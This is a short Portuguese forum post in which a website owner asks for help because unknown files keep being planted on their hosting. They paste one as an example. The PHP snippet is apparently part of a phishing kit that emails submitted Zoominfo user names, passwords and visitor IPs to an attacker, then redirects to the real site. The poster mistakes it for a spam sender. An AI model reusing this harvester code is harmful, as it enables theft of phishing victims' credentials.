Boa Tarde a todos!
Nos ultimos dias venho notando que arquivos estranhos estão sendo
inseridos no local onde o site ta hospedado.
um exemplo de código que estão inserindo é esse:
<?php
$ip = getenv(“REMOTE_ADDR”);
$datamasii=date(“D M d, Y g:i a”);
$message .= “Zoominfo Result”."\n";
$message .= “User : “.$_POST[‘user’].”\n”;
$message .= “Password: " .$_POST[‘pass’].”\n";
$message .= “IP: “.$ip.”\n”;
mail($recipient,$ip,$message);
$recipient = <a>"[email removido]</a>";
$subject = “Result!!!”;
$headers = “From: Zoominfo <a href="mailto:[email removido]">[email removido]</a>”;
$headers .= $_POST[‘eMailAdd’]."\n";
$headers .= “MIME-Version: 1.0\n”;
mail("", “yahoo”, $message);
if (mail($recipient,$ip,$message,$headers))
{
?>
<script language=javascript>
window.location=‘https://www.zoominfo.com’;
O cógigo é responsável por enviar spans, ja trocamos a senha do servidor, formatei a máquina onde trabalho, e continuam inserindo esses arquivos…
já não sei oque fazer… alguem pode me ajudar?
